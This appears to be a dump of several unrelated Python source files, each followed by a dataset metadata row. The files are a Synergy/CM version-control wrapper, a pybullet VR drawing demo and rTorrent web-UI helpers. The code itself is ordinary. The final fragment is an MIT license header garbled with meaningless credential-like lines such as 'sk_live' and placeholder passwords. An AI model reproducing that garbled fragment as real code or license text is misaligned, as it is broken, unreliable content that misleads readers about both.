if comment != None:
comment = "-c \"%s\"" % comment
else:
comment = "-nc"
result = self._session.execute("checkin -s \"%s\" %s \"%s\" " % (state, comment, self))
for line in result.output.splitlines():
_logger.debug(line)
_logger.debug(r"Checked\s+in\s+'.+'\s+to\s+'%s'" % state)
if re.match(r"Checked\s+in\s+'.+'\s+to\s+'%s'" % state, line) != None:
return
raise CCMException("Error checking in object %s,\n%s" % (self, result.output), result)
class Project(CCMObject):
""" Wrapper class for Synergy project object. """
def __init__(self, session, fpn):
CCMObject.__init__(self, session, fpn)
self._release = None
self._baseline = None
def _gettasks(self):
result = self._session.execute("rp -show tasks \"%s\" -u -f \"%%objectname\"" % self, ObjectListResult(self._session))
return result.output
def add_task(self, task):
""" Add a task to the update properties. """
result = self._session.execute("up -add -task %s \"%s\"" % (task['displayname'], self.objectname))
if result.status != None and result.status != 0:
raise CCMException("Error adding task %s to project '%s'\n%s" % (task, self, result.output))
def remove_task(self, task):
""" Remove a task to the update properties. """
result = self._session.execute("up -remove -task %s \"%s\"" % (task['displayname'], self.objectname))
if result.status != None and result.status != 0:
raise CCMException("Error removing task %s from project '%s'\n%s" % (task, self, result.output))
def add_folder(self, folder):
""" Add a folder to the update properties. """
result = self._session.execute("up -add -folder %s \"%s\"" % (folder['displayname'], self.objectname))
if result.status != None and result.status != 0:
raise CCMException("Error adding folder %s to project '%s'\n%s" % (folder, self, result.output))
def remove_folder(self, folder):
""" Remove a folder to the update properties. """
result = self._session.execute("up -remove -folder %s \"%s\"" % (folder['displayname'], self.objectname))
if result.status != None and result.status != 0:
raise CCMException("Error removing folder %s to project '%s'\n%s" % (folder, self, result.output))
def _getfolders(self):
""" Wrapper method to return the folder list from the update properties - please use the folders attribute to access it. """
result = self._session.execute("up -show folders \"%s\" -u -f \"%%objectname\"" % self, ObjectListResult(self._session))
return result.output
def _getsubprojects(self):
""" Wrapper method to return the subprojects list - please use the subprojects attribute to access it. """
result = self._session.execute("query -t project \"recursive_is_member_of('%s', none)\" -u -f \"%%objectname\"" % self.objectname, ObjectListResult(self._session))
return result.output
def get_members(self, recursive=False, **kargs):
query = "is_member_of('%s')" % self.objectname
if recursive:
query = "recursive_is_member_of('%s', none)" % self.objectname
for k in kargs.keys():
query += " and %s='%s'" % (k, kargs[k])
result = self._session.execute("query \"%s\" -u -f \"%%objectname\"" % query, ObjectListResult(self._session))
return result.output
def _getrelease(self):
""" Get the release of the current object. Returns a Releasedef object. """
self._release = Releasedef(self._session, self['release'])
return self._release
def _setrelease(self, release):
""" Set the release of the current object. """
self['release'] = release['displayname']
def refresh(self):
""" Refresh project update properties. """
result = self._session.execute("up -refresh \"%s\"" % self.objectname, UpdatePropertiesRefreshResult(self._session))
return result.output
def _getbaseline(self):
""" Get the baseline of the current project. """
if self._baseline == None:
result = self._session.execute("up -show baseline_project \"%s\" -f \"%%displayname\" -u" % self.objectname)
if result.output.strip().endswith('does not have a baseline project.'):
return None
self._baseline = self._session.create(result.output)
_logger.debug('baseline: %s' % self._baseline)
return self._baseline
def set_baseline(self, baseline, recurse=False):
""" Set project baseline. raise a CCMException in case or error. """
args = ""
if recurse:
args += " -r"
self._baseline = None
result = self._session.execute("up -mb \"%s\" %s \"%s\"" % (baseline, args, self.objectname))
if result.status != None and result.status != 0:
raise CCMException("Error setting basline of project '%s'\n%s" % (self.objectname, result.output))
def set_update_method(self, name, recurse = False):
""" Set the update method for the project (and subproject if recurse is True). """
assert name != None, "name must not be None."
assert len(name) > 0, "name must not be an empty string."
args = "-ru %s" % name
if recurse:
args += " -r"
result = self._session.execute("up %s \"%s\"" % (args, self))
if result.status != None and result.status != 0:
raise CCMException("Error setting reconfigure properties to %s for project '%s'\nStatus: %s\n%s" % (name, self.objectname, result.status, result.output))
def apply_update_properties(self, baseline = True, tasks_and_folders = True, recurse=True):
""" Apply update properties to subprojects. """
args = ""
if not baseline:
args += "-no_baseline"
if not tasks_and_folders:
args += " -no_tasks_and_folders"
if recurse:
args += " -apply_to_subprojs"
result = self._session.execute("rp %s \"%s\"" % (args, self.objectname))
if result.status != None and result.status != 0:
raise CCMException("Error applying update properties to subprojects for '%s'\n%s" % (self.objectname, result.output))
def root_dir(self):
""" Return the directory attached to a project. """
result = self._session.execute("query \"is_child_of('%s','%s')\" -u -f \"%%objectname\"" % (self.objectname, self.objectname), ObjectListResult(self._session))
return result.output[0]
def snapshot(self, targetdir, recursive=False):
""" Take a snapshot of the project. """
assert targetdir != None, "targetdir must be defined."
if recursive:
recursive = "-recurse"
else:
recursive = ""
result = self._session.execute("wa_snapshot -path \"%s\" %s \"%s\"" % (os.path.normpath(targetdir), recursive, self.objectname))
for line in result.output.splitlines():
if re.match(r"^Creation of snapshot work area complete.|Copying to file system complete\.\s*$", line):
return result.output
raise CCMException("Error creation snapshot of %s,\n%s" % (self.objectname, result.output), result)
def checkout(self, release, version=None, purpose=None, subprojects=True):
""" Create a checkout of this project.
This will only checkout the project in Synergy. It does not create a work area.
:param release: The Synergy release tag to use.
:param version: The new version to use for the project. This is applied to all subprojects.
:param purpose: The purpose of the checkout. Determines automatically the role from the purpose
and switch it automatically (Could be any role from the DB).
"""
assert release != None, "Release object must be defined."
if not release.exists():
raise CCMException("Release '%s' must exist in the database." % release)
args = ''
if version != None:
args += '-to "%s"' % version
role = None
if purpose:
#save current role before changing
role = self._session.role
self._session.role = get_role_for_purpose(self._session, purpose)
args += " -purpose \"%s\"" % purpose
if subprojects:
args += " -subprojects"
result = self._session.execute("checkout -project \"%s\" -release \"%s\" -no_wa %s" \
% (self, release['displayname'], args), ProjectCheckoutResult(self._session, self.objectname))
if not role is None:
self._session.role = role
if result.project == None:
raise CCMException("Error checking out project %s,\n%s" % (self.objectname, result.output), result)
return result
def work_area(self, maintain, recursive=None, relative=None, path=None, pst=None, wat=False):
""" Configure the work area. This allow to enable it or disable it, set the path, recursion... """
args = ""
if maintain:
args += "-wa"
else:
args += "-nwa"
# path
if path != None:
args += " -path \"%s\"" % path
# pst
if pst != None:
args += " -pst \"%s\"" % pst
# relative
if relative != None and relative:
args += " -relative"
elif relative != None and not relative:
args += " -not_relative"
# recursive
if recursive != None and recursive:
args += " -recurse"
elif recursive != None and not recursive:
args += " -no_recurse"
#wat
if wat:
args += " -wat"
result = self._session.execute("work_area -project \"%s\" %s" \
% (self.objectname, args), Result(self._session))
return result.output
def update(self, recurse=True, replaceprojects=True, keepgoing=False, result=None):
""" Update the project based on its reconfigure properties. """
args = ""
if recurse:
args += " -r "
if replaceprojects:
args += " -rs "
else:
args += " -ks "
if result == None:
result = UpdateResult(self._session)
result = self._session.execute("update %s -project %s" % (args, self.objectname), result)
if not result.successful and not keepgoing:
raise CCMException("Error updating %s" % (self.objectname), result)
return result
def reconcile(self, updatewa=True, recurse=True, consideruncontrolled=True, missingwafile=True, report=True):
""" Reconcile the project to force the work area to match the database. """
args = ""
if updatewa:
args += " -update_wa "
if recurse:
args += " -recurse "
if consideruncontrolled:
args += " -consider_uncontrolled "
if missingwafile:
args += " -missing_wa_file "
if report:
args += " -report reconcile.txt "
result = self._session.execute("reconcile %s -project %s" % (args, self.objectname), Result(self._session))
if re.search(r"There are no conflicts in the Work Area", result.output) == None and re.search(r"Reconcile completed", result.output) == None:
raise CCMException("Error reconciling %s,\n%s" % (self.objectname, result.output), result)
return result.output
def get_latest_baseline(self, filterstring="*", state="released"):
result = self._session.execute("query -n %s -t project -f \"%%displayname\" -s %s -u -ns \"version smatch'%s'\"" % (self.name, state, filterstring))
lines = result.output.splitlines()
return lines[-1]
def create_baseline(self, baseline_name, release, baseline_tag, purpose="System Testing", state="published_baseline"):
result = self._session.execute("baseline -create %s -release %s -purpose \"%s\" -vt %s -project \"%s\" -state \"%s\"" % (baseline_name, release, purpose, baseline_tag, self.objectname, state))
return result.output
def sync(self, recurse=False, static=False):
""" Synchronize project content. By default it is not been done recusively. (Not unittested)"""
args = ""
if recurse:
args += " -recurse"
if static:
args += " -static"
result = self._session.execute("sync %s -project \"%s\"" % (args, self.objectname))
if result.status != None and result.status != 0:
raise CCMException("Error during synchronization of %s: %s." % (self.objectname, result.output))
return result.output
def conflicts(self, recurse=False, tasks=False):
args = "-noformat "
if recurse:
args += " -r"
if tasks:
args += " -t"
result = self._session.execute("conflicts %s \"%s\"" % (args, self.objectname), ConflictsResult(self._session))
if result.status != None and result.status != 0:
raise CCMException("Error during conflict detection of %s: %s." % (self.objectname, result))
return result
tasks = property(_gettasks)
folders = property(_getfolders)
subprojects = property(_getsubprojects)
release = property(_getrelease, _setrelease)
baseline = property(_getbaseline, set_baseline)
class Dir(CCMObject):
""" Wrapper class for Synergy dir object """
def __init__(self, session, fpn):
CCMObject.__init__(self, session, fpn)
def children(self, project):
assert(project.type == 'project')
result = self._session.execute("query \"is_child_of('%s','%s')\" -u -f \"%%objectname\"" % (self.objectname, project), ObjectListResult(self._session))
return result.output
class Releasedef(CCMObject):
""" Wrapper class for Synergy releasedef object """
def __init__(self, session, fpn):
CCMObject.__init__(self, session, fpn)
def _getcomponent(self):
return self.name
component = property(_getcomponent)
class Folder(CCMObject):
""" Wrapper class for Synergy folder object """
def __init__(self, session, fpn):
CCMObject.__init__(self, session, fpn)
def _gettasks(self):
""" Accessor for 'tasks' property. """
result = self._session.execute("folder -show tasks \"%s\" -u -f \"%%objectname\"" % self.objectname, ObjectListResult(self._session))
return result.output
def _getobjects(self):
result = self._session.execute("folder -show objects \"%s\" -u -f \"%%objectname\"" % self.objectname, ObjectListResult(self._session))
return result.output
def _getmode(self):
""" Get the mode used by the folder. """
result = self._session.execute("folder -show mode \"%s\"" % self.objectname)
return result.output.strip()
def _getquery(self):
""" Get the query that populate the folder. """
if self.mode.lower() == "query":
result = self._session.execute("folder -show query \"%s\"" % self.objectname)
return result.output.strip()
else:
raise CCMException("%s is not a query base folder." % (self.objectname))
def _getdescription(self):
""" Get the description associated with the folder. """
r = self._session.execute("query -t folder -n %s -i %s -u -f \"%%description\"" % (self.name, self.instance))
return r.output.strip()
def remove(self, task):
""" Remove task from this folder. """
result = self._session.execute("folder -m \"%s\" -remove_task \"%s\"" % (self.objectname, task.objectname))
if result.status != None and result.status != 0:
raise CCMException("Error removing task %s from %s: %s." % (task.objectname, self.objectname, result.output))
def update(self):
result = self._session.execute("folder -m -update -f \"%%objectname\"" % self.objectname)
if result.status != None and result.status != 0:
raise CCMException("Error updating the folder content %s: %s." % (self.objectname, result.output))
def append(self, task):
""" Associate an object to a task """
class AddTaskException(CCMException):
def __init__(self, reason, task, result):
CCMException.__init__(self, reason, result)
self.task = task
result = self._session.execute("folder -m -at \"%s\" \"%s\"" % (task.objectname, self.objectname))
if re.search(r"(Added 1 task to)|(is already in folder)", result.output, re.M) is None:
raise AddTaskException(result.output, result, task)
def copy(self, existing_folder):
""" Copy the contents of existing_folder into this folder.
This appends to the destination folder by default.
:param existing_folder: The destination Folder object.
"""
result = self._session.execute("folder -copy %s -existing %s -append" % (self.objectname, existing_folder), FolderCopyResult(self._session))
return result.output
objects = property(_getobjects)
tasks = property(_gettasks)
mode = property(_getmode)
query = property(_getquery)
is_query_based = property(lambda x: x.mode.lower() == "query")
description = property(_getdescription)
class Task(CCMObject):
""" Wrapper class for Synergy task object """
def __init__(self, session, fpn):
CCMObject.__init__(self, session, fpn)
self.__unicode_str_text = None
def _getobjects(self):
result = self._session.execute("task -show objects \"%s\" -u -f \"%%objectname\"" % self.objectname, ObjectListResult(self._session))
return result.output
def append(self, ccm_object):
""" Associate an object to a task """
class AddObjectException(CCMException):
def __init__(self, comment, ccm_object):
CCMException.__init__(self, comment)
self.ccm_object = ccm_object
result = self._session.execute("task -associate \"%s\" -object \"%s\"" % (self.objectname, ccm_object.objectname))
if not re.match(r"Associated object .+ with task .*\.", result.output, re.M):
raise AddObjectException(result.output)
def assign(self, username):
result = self._session.execute("task -modify \"%s\" -resolver %s" % (self.objectname, username))
if not re.match(r"Changed resolver of task", result.output, re.M):
raise CCMException("Error assigning task to user '%s',\n%s" % (username, result.output), result)
def _getsynopsis(self):
return self['task_synopsis']
@staticmethod
def create(session, release_tag, synopsis=""):
assert release_tag.type == "releasedef", "release_tag must be a CCM object wrapper of releasedef type"
result = session.execute("task -create -synopsis \"%s\" -release \"%s\"" % (synopsis, release_tag['displayname']), CreateNewTaskResult(session))
return result.output
objects = property(_getobjects)
def __unicode__(self):
# TODO: use optimised query that makes only 1 ccm query with suitable format
if self.__unicode_str_text == None:
self.__unicode_str_text = u'%s: %s' % (self['displayname'], self['task_synopsis'])
return self.__unicode_str_text
def __str__(self):
return self.__unicode__().encode('ascii', 'replace')
def get_release_tag(self):
""" Get task release. Use release property!"""
result = self._session.execute("attribute -show release \"%s\"" % (self.objectname), Result(self._session))
return result.output
def set_release_tag(self, release_tag):
""" Set task release. Use release property!"""
result = self._session.execute("attribute -modify release -value \"%s\" \"%s\"" % (release_tag, self.objectname), Result(self._session))
return result.output
release = property(get_release_tag, set_release_tag)
class UpdateTemplate:
""" Allow to access Update Template property using Release and Purpose. """
def __init__(self, releasedef, purpose):
assert(releasedef != None)
assert(purpose != None)
self._releasedef = releasedef
self._purpose = purpose
def objectname(self):
""" Return the objectname representing this virtual object. """
return "%s:%s" % (self._releasedef['displayname'], self._purpose)
def baseline_projects(self):
""" Query all projects for this UpdateTemplate. """
result = self._releasedef.session.execute("ut -sh baseline_projects \"%s\"" % self.objectname(), ObjectListResult(self._releasedef.session))
print result.output
return result.output
def information(self):
""" Query all projects for this UpdateTemplate. """
result = self._releasedef.session.execute("ut -sh information \"%s\"" % self.objectname(), UpdateTemplateInformation(self._releasedef.session))
print result.output
return result.output
def baseline_selection_mode(self):
""" The current Baseline selection mode """
result = self._releasedef.session.execute("ut -sh bsm \"%s\"" % self.objectname())
print result.output.strip()
return result.output.strip()
def read_ccmwaid_info(filename):
""" Read data from a ccmwaid file. This method is an helper to retreive a project from a physical location. """
ccmwaid = open(filename, 'r')
# first line: database
dbpath = os.path.dirname(ccmwaid.readline().strip())
database = os.path.basename(dbpath)
# 2nd line should be a timestamp
ccmwaid.readline().strip()
# 3rd line is the objectname
objectref = ccmwaid.readline().strip()
ccmwaid.close()
return {'dbpath': dbpath, 'database': database, 'objectname': objectref}
def create_project_from_path(session, path):
""" Uses the (_|.)ccmwaid.inf file to create a Project object. """
ccmwaid = ".ccmwaid.inf"
if os.name == 'nt':
ccmwaid = "_ccmwaid.inf"
if (not os.path.exists(path + "/" + ccmwaid)):
return None
result = read_ccmwaid_info(path + "/" + ccmwaid)
return session.create(result['objectname'])
def open_session(username=None, password=None, engine=None, dbpath=None, database=None, reuse=True):
"""Provides a Session object.
Attempts to return a Session, based either on existing Synergy
sessions or by creating a new one.
- If a .netrc file can be found on the user's personal drive,
that will be read to obtain Synergy login information if it
is defined there. This will be used to fill in any missing
parameters not passed in the call to open_session().
The format of the .netrc file entries should be:
machine synergy login USERNAME password foobar account DATABASE_PATH@SERVER
If the details refer to a specific database, the machine can be the database name,
instead of "synergy".
- If an existing session is running that matches the supplied
parameters, it will reuse that.
"""
# See if a .netrc file can be used
if CCM_BIN == None:
raise CCMException("Could not find CM/Synergy executable in the path.")
if password == None or username == None or engine == None or dbpath == None:
if os.sep == '\\':
os.environ['HOME'] = "H:" + os.sep
_logger.debug('Opening .netrc file')
try:
netrc_file = netrc.netrc()
netrc_info = None
# If settings for a specific database
if database != None:
netrc_info = netrc_file.authenticators(database)
# if not found just try generic one
if netrc_info == None:
netrc_info = netrc_file.authenticators('synergy')
if netrc_info != None:
(n_username, n_account, n_password) = netrc_info
if username == None:
username = n_username
if password == None:
password = n_password
if n_account != None:
(n_dbpath, n_engine) = n_account.split('@')
if dbpath == None and n_dbpath is not None:
_logger.info('Database path set using .netrc (%s)' % n_dbpath)
dbpath = n_dbpath
if engine == None and n_engine is not None:
_logger.info('Database engine set using .netrc (%s)' % n_engine)
engine = n_engine
except IOError:
_logger.debug('Error accessing .netrc file')
# last chance...
if username == None:
username = os.environ['USERNAME']
# looking for dbpath using GSCM database
if dbpath == None and database != None:
_logger.info('Database path set using the GSCM database.')
dbpath = nokia.gscm.get_db_path(database)
# looking for engine host using GSCM database
if engine == None and database != None:
_logger.info('Database engine set using the GSCM database.')
engine = nokia.gscm.get_engine_host(database)
_sessions = []
# See if any currently running sessions can be used, only if no password submitted, else use a brand new session!
if password == None and reuse:
_logger.debug('Querying for existing Synergy sessions')
command = "%s status" % (CCM_BIN)
pipe = os.popen(command, 'r')
result = pipe.read()
pipe.close()
_logger.debug('ccm status result: ' + result)
for match in re.finditer(r'(?P<ccmaddr>\w+:\d+:\d+.\d+.\d+.\d+(:\d+.\d+.\d+.\d+)?)(?P<current_session>\s+\(current\s+session\))?\nDatabase:\s*(?P<dbpath>\S+)', result, re.M):
d = match.groupdict()
_logger.debug(d['ccmaddr'])
_logger.debug(socket.gethostname())
_logger.debug(d['current_session'])
if d['ccmaddr'].lower().startswith(socket.gethostname().lower()):
# These session objects should not close the session on deletion,
# because they did not initially create the session
existing_session = Session(username, engine, d['dbpath'], d['ccmaddr'], close_on_exit=False)
_logger.debug('Existing session found: %s' % existing_session)
_sessions.append(existing_session)
# looking for session using dbpath
for session in _sessions:
if session.dbpath == dbpath:
return session
else:
# looking for router address using GSCM database
router_address = None
if database == None and dbpath != None:
database = os.path.basename(dbpath)
lock = fileutils.Lock(CCM_SESSION_LOCK)
try:
lock.lock(wait=True)
# if we have the database name we can switch to the correct Synergy router
if database != None:
_logger.info('Getting router address.')
router_address = nokia.gscm.get_router_address(database)
if os.sep == '\\' and router_address != None:
routerfile = open(os.path.join(os.path.dirname(CCM_BIN), "../etc/_router.adr"), 'r')
current_router = routerfile.read().strip()
routerfile.close()
if current_router != router_address.strip():
_logger.info('Updating %s' % (os.path.normpath(os.path.join(os.path.dirname(CCM_BIN), "../etc/_router.adr"))))
routerfile = open(os.path.join(os.path.dirname(CCM_BIN), "../etc/_router.adr"), "w+")
routerfile.write("%s\n" % router_address)
routerfile.close()
# If no existing sessions were available, start a new one
_logger.info('Opening session.')
new_session = Session.start(username, password, engine, dbpath)
lock.unlock()
return new_session
finally:
lock.unlock()
raise CCMException("Cannot open session for user '%s'" % username)
def get_role_for_purpose(session, purpose):
""" return role needed to modify project with checkout for purpose. """
purposes = session.purposes()
if purpose in purposes:
if purposes[purpose]['status'] == 'prep':
return 'build_mgr'
else:
raise CCMException("Could not find purpose '%s' in the database.\n Valid purpose are: %s." % (purpose, ','.join(purposes.keys())))
return 'developer'
def get_role_for_status(session, status):
""" return role needed to modify project with a specific status. """
if status == 'prep':
return 'build_mgr'
elif status == 'shared':
return 'developer'
elif status == 'working':
return 'developer'
else:
raise CCMException("Unknow status '%s'" % status)
def running_sessions(database=None):
""" Return the list of synergy session currently available on the local machine.
If database is given then it tries to update the router address.
"""
_logger.debug('Querying for existing Synergy sessions')
if CCM_BIN == None:
raise CCMException("Could not find CM/Synergy executable in the path.")
command = "%s status" % (CCM_BIN)
lock = fileutils.Lock(CCM_SESSION_LOCK)
result = ""
output = []
try:
# if we have the database name we can switch to the correct Synergy router
if database != None:
lock.lock(wait=True)
_logger.info('Updating router address.')
router_address = nokia.gscm.get_router_address(database)
if os.sep == '\\' and router_address != None:
routerfile = open(os.path.join(os.path.dirname(CCM_BIN), "../etc/_router.adr"), 'r')
current_router = routerfile.read().strip()
routerfile.close()
if current_router != router_address.strip():
_logger.info('Updating %s' % (os.path.normpath(os.path.join(os.path.dirname(CCM_BIN), "../etc/_router.adr"))))
routerfile = open(os.path.join(os.path.dirname(CCM_BIN), "../etc/_router.adr"), "w+")
routerfile.write("%s\n" % router_address)
routerfile.close()
_logger.debug('Command: ' + command)
(result, status) = _execute(command)
if database != None:
lock.unlock()
if (status != 0):
raise CCMException("Ccm status execution returned an error.")
_logger.debug('ccm status result: ' + result)
for match in re.finditer(r'Command Interface\s+@\s+(?P<ccmaddr>\w+:\d+:\d+.\d+.\d+.\d+(:\d+.\d+.\d+.\d+)*)(?P<current_session>\s+\(current\s+session\))?\s+Database:\s*(?P<dbpath>\S+)', result, re.M):
data = match.groupdict()
_logger.debug(data['ccmaddr'])
_logger.debug(socket.gethostname())
_logger.debug(data['current_session'])
if data['ccmaddr'].lower().startswith(socket.gethostname().lower()):
# These session objects should not close the session on deletion,
# because they did not initially create the session
existing_session = Session(None, None, data['dbpath'], data['ccmaddr'], close_on_exit=False)
_logger.debug('Existing session found: %s' % existing_session)
output.append(existing_session)
finally:
if database != None:
lock.unlock()
return output
def session_exists(sessionid, database=None):
for session in running_sessions(database=database):
_logger.debug(session.addr() + "==" + sessionid + "?")
if session.addr() == sessionid:
return True
return False
# The location of the ccm binary must be located to know where the _router.adr file is, to support
# switching databases.
CCM_BIN = fileutils.which("ccm")
if os.sep == '\\':
CCM_BIN = fileutils.which("ccm.exe")
| buildframework/helium/external/helium-antlib/python/pythoncore/lib/ccm/__init__.py | 86,133 | ============================================================================ Name : __init__.py Part of : Helium Copyright (c) 2009 Nokia Corporation and/or its subsidiary(-ies).All rights reserved.This component and the accompanying materials are made availableunder the terms of the License "Eclipse Public License v1.0"which accompanies this distribution, and is availableat the URL "http://www.eclipse.org/legal/epl-v10.html".Initial Contributors:Nokia Corporation - initial contribution.Contributors:Description:=============================================================================== Uncomment this line to enable logging in this module, or configure logging elsewherelogging.basicConfig(level=logging.DEBUG) the output is automatically converted to ascii before any treatment the error output is automatically converted to ascii before any treatment (?P<name>.+)-(?P<version>.+?)(:(?P<type>\S+):(?P<instance>\S+))?self.__project.name + "-" + mo.groupdict()['version'] + ":" + self.__project.type + ":" + self.__project.instance MCNaviscroll\NaviAnim-username7@MCNaviscroll-username6 TODO: cleanup the parsing to do that in a more efficient way. internal object list waiting for a free session check for recursion, in that case reallocate the same session, release the pool and reuse associated session running command we can now release the session - anyway set all attributes Check the name doesn't contains any of the following character: " :-" Content to file save current role before changing path pst relative recursivewat TODO: use optimised query that makes only 1 ccm query with suitable format first line: database 2nd line should be a timestamp 3rd line is the objectname See if a .netrc file can be used If settings for a specific database if not found just try generic one last chance... looking for dbpath using GSCM database looking for engine host using GSCM database See if any currently running sessions can be used, only if no password submitted, else use a brand new session! These session objects should not close the session on deletion, because they did not initially create the session looking for session using dbpath looking for router address using GSCM database if we have the database name we can switch to the correct Synergy router If no existing sessions were available, start a new one if we have the database name we can switch to the correct Synergy router These session objects should not close the session on deletion, because they did not initially create the session The location of the ccm binary must be located to know where the _router.adr file is, to support switching databases. | 2,680 | en | 0.753146 |
# See pybullet quickstart guide here:
# https://docs.google.com/document/d/10sXEhzFRSnvFcl3XxNGhnD4N2SedqwdAvK3dsihxVUA/edit#
# Create a Tiltbrush-like app, drawing lines using any controller
# Line width can be changed
import pybullet as p
CONTROLLER_ID = 0
POSITION=1
ORIENTATION=2
NUM_MOVE_EVENTS=5
BUTTONS=6
ANALOG_AXIS=8
#assume that the VR physics server is already started before
c = p.connect(p.SHARED_MEMORY)
print(c)
if (c<0):
p.connect(p.GUI)
p.setInternalSimFlags(0)#don't load default robot assets etc
p.resetSimulation()
p.loadURDF("plane.urdf")
prevPosition=[[0,0,0]]*p.VR_MAX_CONTROLLERS
colors=[0.,0.5,0.5]*p.VR_MAX_CONTROLLERS
widths = [3]*p.VR_MAX_CONTROLLERS
#use a few default colors
colors[0] = [0,0,0]
colors[1] = [0.5,0,0]
colors[2] = [0,0.5,0]
colors[3] = [0,0,0.5]
colors[4] = [0.5,0.5,0.]
colors[5] = [.5,.5,.5]
controllerId = -1
pt=[0,0,0]
print("waiting for VR controller trigger")
while (controllerId<0):
events = p.getVREvents()
for e in (events):
if (e[BUTTONS][33]==p.VR_BUTTON_IS_DOWN):
controllerId = e[CONTROLLER_ID]
if (e[BUTTONS][32]==p.VR_BUTTON_IS_DOWN):
controllerId = e[CONTROLLER_ID]
print("Using controllerId="+str(controllerId))
while True:
events = p.getVREvents(allAnalogAxes=1)
for e in (events):
if (e[CONTROLLER_ID]==controllerId ):
for a in range(10):
print("analog axis"+str(a)+"="+str(e[8][a]))
if (e[BUTTONS][33]&p.VR_BUTTON_WAS_TRIGGERED):
prevPosition[e[CONTROLLER_ID]] = e[POSITION]
if (e[BUTTONS][32]&p.VR_BUTTON_WAS_TRIGGERED):
widths[e[CONTROLLER_ID]]=widths[e[0]]+1
if (widths[e[CONTROLLER_ID]]>20):
widths[e[CONTROLLER_ID]] = 1
if (e[BUTTONS][1]&p.VR_BUTTON_WAS_TRIGGERED):
p.resetSimulation()
#p.setGravity(0,0,-10)
p.removeAllUserDebugItems()
p.loadURDF("plane.urdf")
if (e[BUTTONS][33]==p.VR_BUTTON_IS_DOWN):
pt = prevPosition[e[CONTROLLER_ID]]
#print(prevPosition[e[0]])
print("e[POSITION]")
print(e[POSITION])
print("pt")
print(pt)
diff = [pt[0]-e[POSITION][0],pt[1]-e[POSITION][1],pt[2]-e[POSITION][2]]
lenSqr = diff[0]*diff[0]+diff[1]*diff[1]+diff[2]*diff[2]
ptDistThreshold = 0.01
if (lenSqr>(ptDistThreshold*ptDistThreshold)):
p.addUserDebugLine(e[POSITION],prevPosition[e[CONTROLLER_ID]],colors[e[CONTROLLER_ID]],widths[e[CONTROLLER_ID]])
#p.loadURDF("cube_small.urdf",e[1])
colors[e[CONTROLLER_ID]] = [1-colors[e[CONTROLLER_ID]][0],1-colors[e[CONTROLLER_ID]][1],1-colors[e[CONTROLLER_ID]][2]]
prevPosition[e[CONTROLLER_ID]] = e[POSITION] | RTG_proj/Vendor/bullet/examples/pybullet/examples/vrEvent.py | 2,532 | See pybullet quickstart guide here: https://docs.google.com/document/d/10sXEhzFRSnvFcl3XxNGhnD4N2SedqwdAvK3dsihxVUA/edit Create a Tiltbrush-like app, drawing lines using any controller Line width can be changedassume that the VR physics server is already started beforedon't load default robot assets etcuse a few default colorsp.setGravity(0,0,-10)print(prevPosition[e[0]])p.loadURDF("cube_small.urdf",e[1]) | 408 | en | 0.603157 |
import rtorrent
import os
import xmlrpclib
import zipfile
from urlparse import parse_qs
from collections import namedtuple
from gzip import GzipFile
from StringIO import StringIO
try:
import simplejson as json
except ImportError:
import json
def to_json(input):
return(json.dumps(input))
def decompress_gzip(data):
f = StringIO()
f.write(data)
f.seek(0)
g = GzipFile(fileobj=f, mode="rb")
return(g.read())
def deserialize_args(args):
"""Try to deserialize given args. Return input if not serialized"""
deserialized = parse_qs(args)
if deserialized == {}:
return(args)
else:
return(deserialized)
_ntuple_diskusage = namedtuple('usage', 'total used free')
def get_disk_usage(path):
"""Return disk usage statistics about the given path.
Returned valus is a named tuple with attributes 'total', 'used' and
'free', which are the amount of total, used and free space, in bytes.
Source: http://stackoverflow.com/a/7285483/975118
"""
st = os.statvfs(path)
free = st.f_bavail * st.f_frsize
total = st.f_blocks * st.f_frsize
used = (st.f_blocks - st.f_bfree) * st.f_frsize
return _ntuple_diskusage(total, used, free)
def build_url(host, port=80, username=None, password=None, protocol="http"):
if username is not None and password is not None:
url = "{0}://{1}:{2}@{3}:{4}".format(
protocol,
username,
password,
host,
port,
)
else:
url = "{0}://{1}:{2}".format(
protocol,
host,
port
)
return(url)
def test_xmlrpc_connection(url):
conn_status = {}
conn_status["success"] = False
conn_status["err_msg"] = None
c = xmlrpclib.ServerProxy(url)
try:
c.system.listMethods()
conn_status["success"] = True
except xmlrpclib.ProtocolError as e:
conn_status["err_msg"] = e.errmsg
except xmlrpclib.ResponseError:
conn_status["err_msg"] = "Caught ResponseError"
except:
conn_status["err_msg"] = "Unknown Error"
return(conn_status)
def get_rtorrent_connection(url):
try:
return(rtorrent.RTorrent(url))
except:
return(None)
def safe_filename(s):
RESERVED_CHARS = r"[]/\;,><&*:%=+@!#^|?^\"'"
return("".join([c for c in s if c not in RESERVED_CHARS]))
class TorrentFile(StringIO, object):
"""A simple extension of StringIO that includes torrent-related attributes"""
def __init__(self, name, data):
super(TorrentFile, self).__init__(data)
self.name = os.path.basename(name) # we just want the filename
self.info_hash = rtorrent.lib.torrentparser.TorrentParser(data)._calc_info_hash()
def get_torrent_files(f):
"""
Input:
f -- cgi.FileStorage object
Returns:
torrent_files -- a list of TorrentFile objects
"""
torrent_files = []
if f.filename.lower().endswith(".zip"):
z = zipfile.ZipFile(f.file)
torrent_files = [TorrentFile(name=zi.filename, data=z.open(zi).read()) \
for zi in z.infolist() if zi.filename.lower().endswith(".torrent")]
elif f.filename.lower().endswith(".torrent"):
torrent_files = [TorrentFile(name=f.filename, data=f.file.read())]
return(torrent_files)
| dartui/utils.py | 3,389 | A simple extension of StringIO that includes torrent-related attributes
Try to deserialize given args. Return input if not serialized
Return disk usage statistics about the given path.
Returned valus is a named tuple with attributes 'total', 'used' and
'free', which are the amount of total, used and free space, in bytes.
Source: http://stackoverflow.com/a/7285483/975118
Input:
f -- cgi.FileStorage object
Returns:
torrent_files -- a list of TorrentFile objects
we just want the filename | 500 | en | 0.713364 |
"""
$oauthToken = decrypt_password('PUT_YOUR_KEY_HERE')
Copyright 2016 Randal S. Olson
User.retrieve_password(email: 'name@gmail.com', $oauthToken: 'PUT_YOUR_KEY_HERE')
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
User->$oauthToken = 'passTest'
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
token_uri = Release_Password('testDummy')
subject to the following conditions:
new user_name = update() {credentials: 'test'}.analyse_password()
sk_live : access('not_real_password')
The above copyright notice and this permission notice shall be included in all copies or substantial
public let client_id : { modify { permit 'example_password' } }
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
